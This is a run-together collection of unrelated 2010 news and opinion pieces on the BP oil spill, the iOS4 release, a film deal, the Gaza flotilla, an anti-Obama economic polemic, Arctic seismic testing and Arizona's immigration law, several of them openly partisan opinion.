The lead article in Thursday ’s Financial Times of London reported the “ alarm ” of British industry over Washington ’s “ inappropriate ” rhetoric against BP .
This reflects fears that Wall Street and the US oil giants will use the disaster in the Gulf to grab a greater share of the market and gain a competitive advantage over the British - based company .
Indeed , plans are already being hatched to shield BP ’s banks , major shareholders and bondholders from potentially billions of dollars in cleanup costs and fines by means of financial maneuvers that will ultimately offload these costs onto the public .
One such scenario , involving either a bankruptcy filing or takeover of BP by a rival firm , such as US - based Exxon Mobil , is described in a recent column by New York Times financial columnist Andrew Ross Sorkin .
He writes : “ The idea that BP might one day file for bankruptcy , particularly as part of a merger that would enable it to cordon off its liabilities from the spill , is starting to percolate on Wall Street .
Bankers and lawyers are already sizing up potential deals ( and counting their potential fees ) .
“ Shell and Exxon Mobil are both said to be licking their chops .
And already , flinty legal minds are dreaming up scenarios in which BP would file a prepackaged bankruptcy and separate the costs of the cleanup — and potentially billions of dollars in legal claims — into a separate corporate entity . ”
Whether BP survives as an independent concern or its top shareholders and creditors are given shelter in Exxon or Shell is of lesser concern to the American ruling class than the defense of the oil industry as a whole .
Acting through elected politicians who are , for all intents and purposes , on its payroll , the oil industry is demanding an end to any , even temporary and partial , restrictions on its activities .
Over the past week , President Obama ’s six - month moratorium on approving new deep - sea drilling operations in the Gulf of Mexico has become the target of an industry campaign that cynically cloaks itself as a defense of jobs .
At a Senate Energy and Natural Resources Committee hearing held Wednesday , Democratic Senator Mary Landrieu of Louisiana , a leading oil industry “ asset , ” demanded that Secretary of the Interior Ken Salazar lift the moratorium , absurdly declaring that if it “ lasts much longer than a few months , it could potentially wreak economic havoc on this region that exceeds the havoc wreaked ” by the BP spill .
In fact , the moratorium , which the media falsely presents as a total ban on offshore drilling , affects only 33 new drilling operations , not those already underway .
Whatever job losses result from Obama ’s token measure are dwarfed by those in the region ’s fishing and tourism industry — losses that will likely be counted in the hundreds of thousands and may never be recouped .
In response , Salazar made clear that the committee Obama appointed to investigate the spill has no intention of stopping new deep - sea drilling operations .
Its goal is to “ press the pause button … not the stop button , ” Salazar said .
“ It ’s a pause button so that we can make sure that we move forward with OCS [ outer continental shelf ] drilling — so that it can be done in a way that is protective of people and protective of the environment as well , ” Salazar added .
There is no credibility to the claim that after three or six months of review , procedures will be put in place to make deep - sea drilling safe , especially since one of the co-chairmen of Obama ’s panel sits on the board of directors of ConocoPhillips .
The entire experience of the oil spill has highlighted the degree to which the government at every level — from the White House , to Congress , to state and local governments — is subservient to big business and incapable of taking any action that threatens its basic interests .
It is an old trick of the ruling class to present jobs , on the one side , and safety and environmental concerns on the other , as incompatible opposites .
Blackmailing desperate workers with the threat of more job losses , the oil industry and its politicians lay out their terms :
Stop drilling and deprive oil workers of their jobs , or resume drilling and risk another catastrophe .
This is a false choice that is based on the premise that ownership and control of the oil industry must remain in private hands and the provision of energy subordinated to private profit .
In fact , the very posing of jobs and the ecological survival of the Gulf as though they were mutually incompatible underscores the irrationality and destructiveness of capitalist ownership of the oil industry .
The only basis for protecting jobs in the oil , fishing and tourism industries , as well as countless small and medium businesses , and protecting the environment is to end private ownership of the energy industry .
The current disaster underscores the incompatibility of modern mass society , so interdependent and complex , and an obsolete economic system based on the enrichment of a tiny elite .
The way to mobilize the necessary resources to clean up the Gulf while providing jobs and fully compensating those who have been devastated by BP ’s criminal negligence is to seize BP , its assets and resources , and use them for the social good , rather than the personal fortunes of its CEOs and big investors .
This must be part of a policy of nationalizing the energy industry and turning it into a public utility , under the democratic control of the working population .
This socialist solution can be achieved only through a political struggle of working people against the Obama administration and both parties of big business , and the fight for a workers ’ government .
The response to the Gulf oil spill must be taken out of the hands of BP and the Obama administration .
An independent commission of scientists and engineers must be given unfettered access to analyze the spill and provide leadership over a massive cleanup effort , employing not 20,000 , as Obama boasts , but hundreds of thousands of workers , who must be given proper training , safety equipment , and be paid good wages and benefits .
Tom Eley
Tom Eley
We make financial research easy
Rapidly and confidently discover the insights you need to win , with institutional grade tools for all .
i Phone 3GS and 3G owners , plus iPod Touch - users , time to plug in to your computer and download iOS4 .
It 's here .
Advertisement
We 're getting reports of the iOS4 being live , and it 's currently being downloaded by users right now .
If it is n't live for you yet , keep hammering that update button until it is .
( Because if you can't get it , then you might as well slow things down for people who can .
I kid , I kid . )
Advertisement
You 'll need to have downloaded iTunes 9.2 ( and you should run a manual back - up if you have n't already ) .
It 's the only way to get the brand new features in Apple 's latest OS that they announced a few months ago , including multitasking , fast app - switching , local notifications , and iBooks .
For the list of the best new features , mosey on over here , otherwise check out the official line from Apple below .
[ Apple ]
Update :
And here are the direct links to the update , courtesy of TUAW >
This way you do n't need to wait for iTunes to tell you you 're ready for an update .
YOU'RE TELLING IT .
i Pod Touch 2G
i Pod Touch 3G
i Phone 3G
i Phone 3GS
and iPhone 4
To install these , hit the update link while holding down the option button , so you can select the fiel you downloaded from your hard drive .
EXCLUSIVE : Curtis Hanson is in talks to direct and Clark Gregg will write a film based on the true story of a mystery man who showed up to a small Missouri town and led a crackdown that cleaned up a scourge of meth labs — only to be exposed as a bank security guard with a Walter Mitty complex and a phony badge .
Fox Searchlight has signed on to the film that will be produced by John Davis , Dan Spilo and David Klawans .
The drama is based on Bill Anthony Jakob , a 36 - year - old bank security guard who was indicted on a 23 - count federal indictment for impersonating a law enforcement officer in a small Missouri town .
He optioned his life rights to the producers in 2008 , when his escapades became a national media story .
Armed with a phony badge , Jakob convinced officials in a town of 1200 residents that he could use the Patriot Act and the Homeland Security Dept. to crack down on the drug dealers .
It worked well until a reporter writing about the hero uncovered the truth with a simple Internet search .
The original intent was to turn the premise into a comedy .
But it was n’t funny for the real law enforcement officers because the fakery tainted all of the arrests which Jakob made .
Israel gave strong indications today that its forces had secretly sabotaged some of the ships bound for Gaza as part of the freedom flotilla .
Matan Vilnai , the deputy defence minister , was asked on Israel Radio whether there had not been a smarter alternative to direct assault .
He answered that " all possibilities had been considered , " adding : " The fact is that there were less than the 10 ships that were due to participate in the flotilla . "
The comments appeared to dovetail with reports that two of the vessels malfunctioned at the same time and in the same way .
Challenger I and Challenger II , carrying 36 activists , were forced into port in Cyprus on Friday evening when steering systems on both ships broke down on the passage from Heraklion in Crete , a campaign spokeswoman said .
Challenger II also started taking on water after the bilge pump suddenly stopped working and an inspection yesterday revealed " very suspicious " faults , according to Greta Berlin , a spokeswoman for Free Gaza .
An unnamed Israeli Defence Force source who briefed the Knesset 's foreign affairs and defence committee on the widely criticised armed interception of the flotilla at sea , also spoke of " grey operations " being mounted against the flotilla .
No further detail was reported , probably because of the military censorship rules binding the Israeli media .
Both were forced to radio distress signals to Cypriot ports and Berlin said the captain of Challenger I , Denis Healey , was " frightened that he was not going to be able to get the boat in " .
" They had mechanical probles on Friday afternoon at around 3.30 pm when they were going towards Cyprus to pick people up .
They had been travelling from Crete and had been at sea for about 30 hours , " she said .
Once in port in northern Cyprus , Healey had to repair hydraulic lines on the vessel .
Challenger II had to pull alongside the main Turkish ship , the Mavi Marmara , on the high seas 70 miles off Cyprus , to transfer its passengers before it limped into port .
The unnamed Israeli officer also said that military planners had considered trying to stop the Mavi Marmara rather than board it but had decided against it because the Turkish ship was too fast .
There is at least one precedent for naval sabotage by the Israelis .
Flotilla 13 , the elite naval commando unit that carried out Monday 's raid , reportedly blew up a ship named al - Awda ( the Return ) which was chartered by the PLO in 1988 to dramatise the plight of Palestinian refugees .
It sank in Limassol harbour , Cyprus .
While it may appear that the Obama Administration has embarked on a totally different course from other Administrations , the fact of the matter is that it is simply a continuation of an agenda that has been operating in this country , to one degree or another , not only for decades , but for much , much longer .
The seeds of the destructive nature of this present government 's policies predate the ratification of the Constitution , but of late those seeds have began to bear fruit , a vile , degenerative fruit that places the future of this country , its people and their liberty in the utmost jeopardy .
The eventual effects of this government 's policy will be chaotic in nature and affect every aspect of our lives .
As stated , this course is not a new one , but one that has been gradually implemented , whether conscientiously intended or not , by a political mindset that promotes the consolidation of the powers of all government into the hands of the political class .
The ideology has morphed little since the time of Hamilton , the central theme is an all - powerful government , whether Monarchist , Mercantilist , Consolidationist or Socialist in nature .
The core of this ideology is that all power rests , not in the people , but in the government .
The methods to achieve such a consolidation of power have been varied , but primarily rest within the sphere of monetary economics where a political economy can be produced and expanded to the point of complete government control .
While it is not a recent development , the Obama Administration has embarked on a very definite path toward controlling , either directly or indirectly , the means of production in this country to an extent that has not been seen previously , as such , the distortions which already exist due to past government intervention in the markets will become more exaggerated and new distortions will be created .
As the distortions increase so too does the chaos and as this happens those within this government , without a clear explanation of the causes or solutions to the problems it creates , will simply continue on the same chaotic path with even more vigor .
Upon this path lay eventual price and wage controls , they are inevitable .
The entire system employed by this government , fueled through a total fiat currency , is built upon an ideology that not only ignores the principles of sound monetary economics , but also must ignore such principles .
Of course , one of the major issues of such policies is that eventually they become not only cumulative in nature , but also self - perpetuating .
The necessity of further government intervention simply becomes unavoidable .
A point is reached where the government has no alternative but to gear - up its efforts to combat the effects of its own policies , one of the indicators that the government has lost control of the actual economic when it is forced to actually seize control of businesses , the means of production within various sectors of the economy , especially the financial sector .
As stated before , this is not a new path , but one that has gradually been enlarged to the point where we now find ourselves .
While there are different definitions of Socialism , the fact is that the common thread throughout all such definitions is increasing necessity of government controls and what amounts to de facto ownership over the means of production and distribution of goods and services .
It is the government 's ability to gain and then exercise control over economic matters that increasingly cause markets to lack the ability to adequately calculate economic information in business decisions .
This stealth form of Socialism is insidious for it gives the general appearance that government planning is necessary to maintain economic market viability when just the opposite is true .
When government policy encompasses the power to actually determine the manner in which economic functions are expressed in the markets then the entire definition of ownership eventually falls under government control since the government is able to , through legislative acts and non-legislative statutes , determine the actual use of property , as well as the disposal of such property .
The economic movement of goods and services are increasingly swayed by government policy and regulation , as such there is , in a very real sense , a transfer of ownership from the private sector to the public sector or government .
While it appears that there is private ownership within the economy , in actuality that ownership is only nominal since it has been effectively transferred via such legislations and statues .
Essentially , a nationalization of economic functions has gradually taken place where government controls and mandates supercede the ability of control over property rights traditionally thought of as being solely owned through the determination of actual title to goods and services by individuals or companies .
Such gradualism toward a Socialistic economy has , of course , been accomplished under the name of capitalism , the government allowing for a degree of capitalistic traits to be maintained to continue the ruse .
Essentially , while it appears that actual private ownership is legally maintained the fact is that due to the legislative and mandated controls , private ownership is actually only maintained as long as the legal restraints on that private property are fulfilled by those who claim such private ownership .
If the legal restraints are violated , which is a rather simply matter for the government , at any level , then the government can step - in without any consideration of what should be protected private property rights .
It must also be understood that the actual definition of private property and the rights that protect such property have gradually been diluted , being now dependent upon the allowances of government legislation .
It is generally accepted by the population that their property is subject to potential intervention by the government , whether that intervention is through restrictive regulation , increasingly heavy taxation , or more drastically , the potential for forfeiture to some government agency .
No longer is allodial title to private property sacrosanct , but all title to property rests solely at the political and bureaucratic whims of government .
Gradually , what has been a mixed economic system is being transformed into a completely Socialistic economic system , though it will never be described as such .
Through the last century and a half , this economy has gone from a free - market to a mixed economy and is now moving toward a completely quasi-Socialistic economy that is characterized by government corporatism and economic tyranny .
The consequences of such a transition however , will not be as simple as the political class envision , the resulting chaos stemming from this transition has the potential of destroying the political superstructure as it now stands .
Under the mixed economy that began in earnest during the 1930s the system requires intervention by government ; as stated , it eventually becomes inevitable that more and more intervention is required to maintain the system .
While under a mixed economy , the means of actual production and distribution are maintained privately , but are subject to government control ; this continues until the effects of such intervention creates an increasing need for more government intervention , so much so that economic distortions eventually require the government to intervene even more into economy to the point that it must take drastic measures to maintain the economy .
Such measures always fail to accomplish the stated purposes , as such more measures are required to keep the system afloat .
As economic chaos increases , the uncertainty of the public is used to the advantage of the government , making it politically palatable for the government to propose more intervention , leading to more chaos requiring more intervention .
As this government takes upon itself responsibilities that are normally associated with the markets , it is the government that ultimately decides how goods and services are created , used and disposed .
Eventually , of course , such interventions bring about such distortions in the markets that it becomes impossible for the government to reverse the effects of such distortions .
We have already reached the point where the government must begin to institute certain controls to maintain the system it has created .
Such controls will come in the form of a greater degree of manipulation of wages and prices until the manner in which the division of labor is determined in the market is corrupted and non-functional .
The mere act of buying and selling is no longer governed by the markets alone , but by the legislative policies of government .
As the intervention continues , at some point the right to bid pricing on a good or service or the right of ask pricing no longer applies , this happens because of the controls that the government institutes and must institute to keep a semblance of functionality within the economy .
This however , only exacerbates the problems associated with continued economic distortions until shortages begin to appear within the market .
The Obama Administration has already given plenty of hints as to what is in store for our country .
Recently , Mr. Obama stated that :
“ We 're not , we 're not trying to push financial reform because we begrudge success that 's fairly earned .
I mean , I do think at a certain point you 've made enough money .
But , you know , part of the American way is , you know , you can just keep on making it if you 're providing a good product or providing good service .
We do n't want people to stop , ah , fulfilling the core responsibilities of the financial system to help grow our economy . ”
J. Kenneth Galbraith said :
“ There is a widespread notion that one of the most primitive of modern ideological choices is whether a government shall be Keynesian or not . . . no present or future administration really has the non-Keynesian choice . ”
As the future will prove , the Administration will engage in a soft form of wage and price controls , but even in the soft state , such controls will ultimately be devastating in terms of economic functions .
Such destructive attributes associated with wage and price controls eliminate the rights of ownership in the private economy .
It is a de facto form of Socialism that has all the characteristics of a Socialistic economy in everything but name , all that remains of free market capitalism is an empty shell .
Such controls deprive those in business from the use of their capital freely , the uses ultimately being determined by the various measures implemented by government .
The government interferes with the natural economic market functions , interjecting conditions and restrictions on business to the point that businesses can no longer use their capital in the most profitable manner possible .
The limitations on profit filters through the economy , diverting resources and redistributing those resources in ways that cause economic distortions .
Now it must be understood that such controls have been in place for decades , but with the election of Barack Obama , the goal of transforming the United States into a Socialistic society is closer than ever .
It is clear , not only by the actions and the words of Obama , that the intentions of the Administration are far from what could remotely be considered Constitutional , or even American for that matter , but it is also clear that Obama is following a well - beaten path of Socialistic ideology that has plagued this country since the period of Lincoln .
The entire impetus from the period of Lincoln to Obama has been , with little interruption , a path of the consolidation of a nationalized government with the power to control every aspect of the lives of individuals .
In order to do this it was necessary for the free - market to be completely destroyed and a system of centralized planning be implemented .
The first barrier that had to be removed was sound money , after that it was necessary to implement a form of economic theory that would not only allow the government to gain control over the economy , but would make it necessary for it to gain control through the gradual destruction of monetary and economic functions that operate according to free - market principles .
Keynesian economic theory was , without a doubt , one of the single most important tools in the Marxist agenda for this country .
As Joan Robinson , a Keynesian economist stated : ” the differences between Marx and Keynes are only verbal ” .
The agenda is to control , not necessarily to own all productive and distribution avenues within this country and to do that it is of primary importance that the government bring about a certain degree of disruption in the economy .
Such a disruption , whether intentional or not , would make it necessary for more and more government intervention into economy and social matters .
As a former Keynesian Economist , Dr. L.A .
Hahn stated : For it [ the Keynesian view ] presupposes an economy whose members do not see through the changes brought about by monetary or fiscal manipulation or as some might say , the swindle .
Above all , it presupposes that people are blinded by the idea that the value of money is stable by the “ money illusion . ”
It is indeed an illusion , there is nothing real about the Keynesian economic foundation upon which this economy now rests , nor is there any reality within the fiat monetary system that keeps the government expanding .
The key to ability of this government to expand its power , abusing the delegated and enumerated powers along the way , is the fiat monetary system employed by government to bypass all Constitutional limitations .
As the government continues to expand its influence over the lives of the individual , as it seeks to redistribute the wealth of the people into what it considers a more equitable distribution , it produces , in reality , a stratified society where the ruling classes are never included in the egalitarian plan .
A government aristocracy develops that sets itself above its own mandates for Socialistic equalities ; those that are privileged exclude their own participation in meeting the required mandates of government legislation .
Unfortunately , for the government , central planning can take unexpected paths ; usually it forms chaotic paths due to the effects of intervention in the market .
While it most certainly appears that there are those within this government to have full faith in the ability of government to actually control economic mechanics , the reality is that it is simply impossible .
All efforts in that direction only increase the distortion already created by previous government intervention and interference into the market .
Those within government , the politicians and bureaucrats will always seek to expand production within the economy however ; the massive inefficiencies brought about by the governments own intervention in the markets inhibits such production .
The incentives of production are destroyed , not only are the incentives to produce destroyed , but the incentive to act productively is destroyed by the unending cycle of government intervention necessary to keep the system hobbling .
The really amazing fact is that even in the face of such overwhelming evidence of the failure of Socialistic economic policies , most politicians who adhere to such ideology are completely unwilling or unable to abandon the ideology .
As with all Socialistic or quasi-Socialistic political economic systems , the resources and funds required to maintain such a system become enormous , even crippling to the markets .
Instead of providing economic stability , the results are chaotic disruptions as the government intervention apparatus continues to intervene to correct the problems resulting from the previous manipulations by the government in the economic processes .
It is a cycle of destruction , feeding upon itself as the government continues to gain more and more control over economic matters .
Eventually , the entire system becomes unmanageable and the controls unenforceable .
Under such system there can never be any real planning , such planning must eventually reach the stage of reactionary responses to the consequences of the governments own policies and legislative mandates .
Real control becomes illusionary .
As the government assumes more and more responsibility for the economic well being of the citizens , the less well being there is to go around .
Everyday life becomes almost unbearable as people attempt to skirt the system that has entrapped them .
Resentment and open hostility will manifest , causing the government , in the interest of its own survival , to brutalize the people .
Individual freedoms are sacrificed for The State Collective , propaganda is geared toward any hint of discontent and those who intend to rule do so with the cruelest intent .
As failures mount , the government is quick to place blame , that is , to place blame on anyone and everyone other than itself and its policies .
The government must turn to external threats in hopes to rally the people behind it and no longer depends on reality of potential threats , when it is enough to fabricate those events to garner support .
Of course , corruption is always present , but now and then it becomes necessary to expose internal corruption to maintain a degree of legitimacy in the eyes of the people .
As the Socialistic economic and social system crumbles under its own weight , the government must resort to overt force to maintain its control over the people ; there is no other alternative but state - terror as a sanctioned method of maintaining its power .
The Obama Administration has set its course , a course that is resulting in one of the most massive periods of deficit spending in the history of our country ; the only real method for financing that spending is a policy of inflation since there is no possible way for this government to tax its way to solvency .
Using the government 's favorite instrument , fiat currency , it has been able to spend with wild abandon without the worry of massive taxation at this point to keep the system working .
Factually , there is absolutely nothing this government can do , or will do , to get itself and this country out of this situation it now faces .
The actions of this government have been , and are , distorting , actually destroying the uniform rate of profit that the markets normally establishes and governs .
As such , this distortion can be seen in the manner in which businesses make business decisions and even how they account for profit .
The entire system of fiat currency and the economy on which that system must be based creates some of the most destructive economic factors that eventually cannot be hidden in the real world .
The rate of influx within the withdrawal and injection of capital is contorted through the inflationary depreciation of the fiat monetary regime .
As such , the actual profit and therefore , capital available to business and even individuals is a facade and cannot provide an accurate portrayal of economic reality .
This distortion can easily be seen by comparing profits without the effects of inflation with the effects of inflation on the rate of profit .
Eventually , this begins to corrode the basis of production , even the motives behind production .
Indeed , since the rate of profit becomes distorted , over time , the measure of total production also is distorted , as well as the ability of business to correctly anticipate actual consumer demand .
It should be evident that along with the distortions created by the monetary system and the manipulation of that system , there has , by necessity , been a drastic increase in what can only be considered an almost completely subsidized economy , generated by the power of government to redistribute wealth from what remains of the productive sector of the economy to the non-productive sector , as well as those businesses which are politically connected .
Subsidies are nothing more than a form of price control , along with such price controls ; wages are equally manipulated through various means , from taxation to fiat inflationary depreciation .
Under such a system , there can never be real expectations of stable future pricing or wages sufficient to keep pace with unstable fiat pricing .
Since the economy adjusts itself to the quantity of money available , the fiat monetary system , being manipulated by external forces , i.e. the government , the adjustments themselves are a product of quantity distortions in the supply of fiat money .
A problem arises when this distortion affects the value judgments of businesses and individual consumers , which , in turn , affects the demand within the economy , usually causing a misallocation of resources and labor .
There is a very good reason why a fiat economy must depend upon a great deal of fiat credit creation , the system by itself , cannot maintain economic progress over a long period of time and will falter without such fiat credit creation .
Such a condition , of course , creates a number of dangers , the least of which is the level of accumulated debt that must be held to maintain the fiat economic system .
Additionally , since the normal and healthy forces within a free - market economy are manipulated , and thus distorted , by government intervention , the actual supply of resources are diverted to elements within the economy which , may or may not be the most important employment of those resources as they would be under a free market economy .
Government regulation tends to create these diversions of resources , rerouting resources to less efficient production that would be normal under a free market .
Normally , in a free market , the market will naturally form a variable range where supply and demand expand and contract naturally , the same cannot be said of the government 's manipulated economy .
A free market will determine all prices by costs of production ; this is done with respect to the individual 's economic value judgments as a balance is achieved in the market based on the various forces at play within the economy .
In the Socialistic economy , eventually no such value judgments are possible , supply and demand become skewed according to government policies affecting those forces .
What was once only a transitional form of Socialism has now been implemented forcefully by the Obama Administration .
This form of Socialism cannot be considered traditional Socialism , but is a conglomeration of Socialistic principles mixed , by necessity , with free - market principles , but the transition to a total Socialistic system is much closer under the Obama Administration than at any other time in our history .
The problem that the Obama Administration seems to be completely oblivious of is the fact that under such a system there can be no real economic progress , the economy falls into deeper levels of disarray , requiring more and more government intervention just to create a degree of balance within the economy .
While the former Soviet Union suffered a rather rapid decay due to various factors , the least of which were an unsustainable Socialistic economic system , the United States will suffer form a slightly different type of economic and social decay .
Obama 's Kiss of Death will include a combination of factors that were not prevalent in the former Soviet Union , but there will be comparisons to be sure .
The fact that the United States has been so dependent upon an open fiat monetary system , fractional reserve banking system and fiat credit creation that there will be a much more intense form of decay , causing an intense collapse on many fronts , including societal .
There will be a convergence of events taking place through the fiat economies around the world , the events of the United States will prove to be a fatal blow , not only domestically , but on the foreign economic fronts .
As the economic situation grows worse , so too will the attempts of the government to maintain control and power .
These attempts will naturally include tactics that will not be mistaken as anything but tyrannical , despotic and cruel .
The government will take upon itself life and death decisions that will impact every aspect of the lives of the People of this country .
As an high rate of fiat inflation turns extreme , more extreme price controls will ensue , making matters worse , leading to massive shortages and setting off a cycle of uncontrollable events that will seem , in many respects , contradictory in traditional economic terms since there is no real historical comparison available .
A hyper-inflationary depression will produce events that mimic both deflation and inflation , but are not , in the strictest sense either .
The displacement of employees will be massive as layoffs increase at an alarming rate .
Many of the most respected companies will be wiped away with a rapidity that will literally be shocking and economically earth shaking .
Property rights will be the first to suffer then will come the abolishment of all individual rights .
There will be a rapid rise in black market activities and the government will seek to impose draconian measures to prevent such activities , without much effect .
The forcible expropriation of the means of all production , the implementation of heavy - handed controls of both prices and wages will inevitably create even more chaos .
We will see starvation on an ever - increasing scale , along with acts of desperation by the public as mass confusion and distrust spread .
Widespread violence will bring about even more acts of abuse and even atrocities which will be viewed as necessary and perhaps even proper [ by the political elite ] given the increasingly uncontrollable situation .
The Panic of 2008 , which is the preview of events to come , will appear to be good times as the economic system deteriorates in the most surprising ways imaginable .
Economic and therefore , social dislocation will be nightmarish in the extreme , social unrest will gravitate toward complete chaos and all faith in government will be erased .
The real danger , particularly for this government , is the social unrest that will result from such distortions .
There will either be a complete breakdown of the economic functions in this country or there will be a continuation of a gradual disintegration , which will allow the government to implement a complete Socialistic economy , thus a society , without the need for forceful restraint .
In other words , if there is a very gradual decline in the economy well - being of this country then the people will be much more receptive of such government controls and intervention .
If however , there is a rapid disintegration , which at this point can be expected , then the likelihood of a drastic backlash against government intervention is possible .
The traditional views upon which this country was founded have a chance of resurfacing during such a period of disintegration .
That being said , there is still hope and it is not the kind of hope promoted and promised by this illegitimate Administration .
It is a hope of Restoration , a hope that the People of this country have reached the point where they are no longer asleep and have started to question the actions and motives of their government .
Perhaps the greatest force to confront this heavily centralized government is the 10th Amendment Movement and the empowerment of the Several States to interpose themselves , effectively nullifying federal government actions and laws in favor for a much more Constitutional stance .
The concerted efforts of a growing number of States , with a growing awareness and support of the Citizens of those States , will be persuasive , as the movement grows , so to will be the pressure on the federal government to reconsider its stances and actions .
A plea to the common sense of the American People , or at least that which remains , will go far in crippling the goals of this Administration .
There will come a time , and we have almost reached that point , when the American People will finally have had enough of the folly instituted by this government .
We are fortunate in that the People of this country are not accustom to nor inclined to trust nearly as much as other countries where the tradition of being subjected to a paternal government was generally accepted as normal .
There are rumblings in the land , and many of those rumblings are coming from the some of the more surprising places and people .
Hey there , time traveller !
This article was published 8/6/2010 ( 3767 days ago ) , so information in it may no longer be current .
Opinion
Every schoolchild knows that the Arctic and the Antarctic are the most fragile ecosystems in the world -- and the " last frontier " in humanity 's ever - more - frantic race to drain the Earth 's store of fossil fuels to the last drop .
Federal Environment Minister Jim Prentice appears to have four positions on Arctic oil and gas exploration : perhaps drill , perhaps preserve , gut environmental regulations , and criticize other countries who might drill .
Lancaster Sound ( Talluritup Tariunga in Inuktitut ) was named in 1616 by explorer William Baffin after one of his patrons .
It lies between Devon Island and Baffin Island .
To its east is Baffin Bay ; to its west is Viscount Melville Sound ; to the west , is McClure Strait leading to the Arctic Ocean .
Its wildlife is rich and varied , including most of the world 's surviving narwals , one - third of North America 's belugas , endangered bowhead whales , ringed , bearded and harp seals , walrus , polar bears and thick - billed murres .
Its soaring 400 - metre cliffs are nesting grounds for roughly one - third of eastern Canada 's seabird colonies , including black - legged Kittiwakes , northern fulmars , black guillemots , Arctic terns , ivory gulls and snow geese , many of which dine on the sound 's 30 species of fish , including an estimated 30,000 tonnes of Arctic cod annually .
On Dec. 8 , 2009 , Prentice announced a $ 5 - million feasibility study to designate Lancaster Sound , the eastern portion of the Northwest Passage , a new national marine conservation area .
But in April , 2010 , Natural Resources Canada 's Geological Survey of Canada submitted a proposal to the Nunavut Impact Review Board to do seismic testing for oil and gas within Lancaster and Jones sounds this summer .
In late May , the board gave the green light , ignoring the unanimous opposition from Inuit mayors and hunters .
Prentice insists the seismic tests wo n't slow steps towards protecting Lancaster Sound as a marine park .
" I have no information to indicate that the seismic testing ... would represent a threat to wildlife in any way , or to living life in the oceans .
There 's no indication of that , " he says .
Discovering what resources lie beneath the seabed is just a normal step before the sound can be protected , he continues .
" I think , quite appropriately , we want to know the nature of the resources that are there for future planning , so that it 's clear to us . "
Not only does the mention of " resources " raise suspicion , but Prentice 's assurances appear at odds with his government 's actions .
The Conservatives have refused to issue a moratorium on off - shore drilling .
While Prentice says " there are no licences issued for deep wells , " he tellingly adds " the soonest anybody could drill deep wells in the Canadian Arctic is 2014 . "
The Toronto Star reported on May 26 that the Geological Survey plans to use powerful blasts from underwater air guns , towed by a German research vessel , to look for oil and natural gas fields in Lancaster Sound .
The blasts would occur at one - minute intervals for a total of 600 hours .
Environmentalists warn the shots could damage the hearing and sonar navigation of whales , belugas and other sea mammals , disrupting their migratory patterns .
The review panel proposes " that all air gun start - up procedures include a ' soft - start / ramping - up ' period " and that the guns stay silent if marine mammals or seabird colonies are spotted within a " full 1,000 - metre safety zone . "
To its credit , the panel criticizes the " lack of consultation " between the Geological Survey and other federal departments and cites " a lack of meaningful consultation with potentially affected communities . "
Among a wide range of non-budget - related initiatives cleverly wedged into the government 's 900 - page budget bill , is the gutting of Canada 's environmental rules .
The budget is a confidence matter and is being used by the minority Conservatives as a vehicle to push through programs and policies .
Although Canada 's environmental regime is much weaker than America's , the budget bill endows the environment minister with new powers to limit and exempt future infrastructure and resource projects from any review .
But none of this stops Prentice from lecturing other jurisdictions about their environmental lapses .
Today , he plans to raise concerns at an Arctic environment ministers ' meeting about a newly licenced Greenland offshore project in the Davis Strait .
Massive icebergs pass through the strait 's rough waters on their journey to the Atlantic Ocean .
States Prentice : " We want to make sure that the standards that are in place ( in Greenland ) are the highest environmental standards . "
Frances Russell is a Winnipeg author and political commentator .
Summary
We ’ll leave it to others to decide whether Arizona ’s new immigration law is a good thing or a bad thing — but here we try to straighten out some of the confusing factual claims .
First , a quick summary .
Contrary to what the law ’s defenders often say , the new statute does more than merely mirror federal law .
For example :
It ’s a state crime for an illegal immigrant to apply for a job , or to solicit work publicly .
The law also makes it a misdemeanor for a citizen driving a vehicle to stop to hire anyone if that " impedes " traffic .
Citizens will be able to sue officials or agencies whose policies interfere with vigorous enforcement of federal immigration law .
On the much - discussed issue of whether the law permits or encourages " racial profiling , " we find :
The amended law allows police to consider " race , color or national origin " when deciding whether to ask somebody for proof of citizenship , but only to the extent already deemed constitutional by the courts .
It remains to be seen how police will interpret the law ’s anti-profiling language in practice .
State officials tell us they have yet to work out what factors police should be trained to use to establish " reasonable suspicion " of illegal status .
Federal officials are open to criticisms similar to some of those being made about Arizona ’s law .
A federal manual for training state and local officials says they may consider whether a person has a " thick foreign accent " or looks " out of place " when deciding whether to ask them about their immigration status .
Finally , we examine a widely circulated chain e-mail written by an Arizona state senator who supports the law , and find her claims to be misleading .
The violence against ranchers that she describes is real , but it is the work of Mexican crime cartels , not illegal immigrants .
Analysis
Recently , Arizona Gov. Jan Brewer posted a video that uses a frog puppet to mock critics of the state ’s new immigration law for not having actually read it .
We ’re asked to sing along with the amphibian as he croaks , " reading helps you know what you ’re talking about . "
Well , we ’ve read it ( take that , frog ! ) .
Below , we try to address a few of the questions and misperceptions that seem to go hand - in - hand with the get - tough statute that targets illegal aliens .
According to a report by the Pew Hispanic Center , there were an estimated 500,000 illegal immigrants living in Arizona in 2008 .
The state wants that number to drop .
In its first paragraph , the new law says that " the intent of this act is to make attrition through enforcement the public policy of all state and local government agencies in Arizona . "
Does n’t the Arizona law just mirror federal immigration law ?
Brewer has responded to critics of her state ’s law – commonly referred to as S.B. 1070 – by saying it replicates federal law .
Brewer , April 30 : Our law mirrors federal law .
So , why is it bad for Arizona to mirror federal law ?
No one was crying out in the wilderness about the federal law being wrong or racial profiling .
I do n’t get it .
It ’s spin .
To a degree , she ’s right .
Arizona ’s new statute contains provisions that criminalize , at the state level , certain conduct that ’s already a violation of federal immigration law .
For instance , immigrants are required under both state and federal laws to carry their alien registration documents or other applicable records at all times – in federal law that ’s under 8 USC sec.1304 and 8 USC sec.
1306 .
Other parts of the state law , though , do n’t exist at the federal level .
They include section 5A , making it illegal for a driver to stop and attempt to hire or to hire and pick up passengers , if that action impedes traffic ; for a person to get into someone ’s vehicle in order to be hired ; or for an illegal alien to apply for work or solicit work publicly in the state .
Most of this is aimed at day laborers and those who hire them .
Another example : Section 2H allows any citizen to sue an official or agency in the state who " adopts or implements a policy that limits or restricts the enforcement of federal immigration laws to less than the full extent permitted by federal law . "
And section 2B of the new law requires law enforcement officers to try to check the immigration status of anyone they lawfully stop if they have " reasonable suspicion " the person might be an unauthorized immigrant .
( More on this provision later ) .
But why the outcry ?
These people are here illegally , right ?
There are plenty of features of the law that critics find objectionable .
Among them are the penalties .
Under federal law , violations of immigration statutes by someone in the U.S. illegally may in some cases be punished with a jail sentence but are often penalized by deporting the individual instead , if the government proves its case to a judge through a comprehensive set of procedures .
